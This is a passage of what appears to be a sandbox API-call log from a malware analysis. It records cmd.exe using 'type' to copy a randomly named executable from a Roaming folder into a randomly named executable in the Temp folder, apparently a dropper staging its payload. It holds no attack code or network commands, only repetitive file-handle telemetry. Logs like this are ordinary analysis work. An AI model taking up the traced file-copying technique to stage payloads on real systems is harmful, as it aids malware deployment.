_String2="type") returned -14 [0114.937] _wcsicmp (_String1="IF", _String2="type") returned -11 [0114.937] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0114.937] _wcsicmp (_String1="REM", _String2="type") returned -2 [0114.937] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0114.940] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 68 [0114.940] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 68 [0114.941] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 71 [0114.941] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 71 [0114.941] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 80 [0114.941] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 80 [0114.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.944] GetFileType (hFile=0x7) returned 0x2 [0114.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0114.944] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af4e4 | out: lpMode=0x2af4e4) returned 1 [0114.944] _dup (_FileHandle=1) returned 3 [0114.944] _close (_FileHandle=1) returned 0 [0114.944] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", _String2="con") returned -53 [0114.944] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af4b4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0114.945] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 
[0114.945] GetConsoleTitleW (in: lpConsoleTitle=0x2af2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.945] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0114.945] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0114.945] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0114.945] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0114.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.946] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2aee48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee48) returned 0x80f68 [0114.946] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0114.946] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0114.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0114.946] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2add54, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0114.946] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] GetFileType (hFile=0x54) returned 0x1 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2addac | out: lpFileSizeHigh=0x2addac*=0x0) returned 0x7d600 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | 
out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0114.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.948] GetFileType (hFile=0x4c) returned 0x1 [0114.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.948] GetFileType (hFile=0x4c) returned 0x1 [0114.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.948] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] GetFileType (hFile=0x4c) returned 0x1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] GetFileType (hFile=0x4c) returned 0x1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] GetFileType (hFile=0x4c) returned 0x1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 
[0114.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.950] GetFileType (hFile=0x4c) returned 0x1 [0114.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.950] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] GetFileType (hFile=0x4c) returned 0x1 [0115.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] GetFileType (hFile=0x4c) returned 0x1 [0115.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.061] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.061] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.061] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.061] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.063] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.063] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType 
(hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.064] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.064] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] GetFileType (hFile=0x4c) returned 0x1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, 
lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.065] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.065] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.065] GetFileType (hFile=0x4c) returned 0x1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0115.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.066] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.066] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] GetFileType (hFile=0x4c) returned 0x1 [0115.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.067] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] GetFileType (hFile=0x4c) returned 0x1 [0115.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.068] _get_osfhandle (_FileHandle=4) returned 0x54 
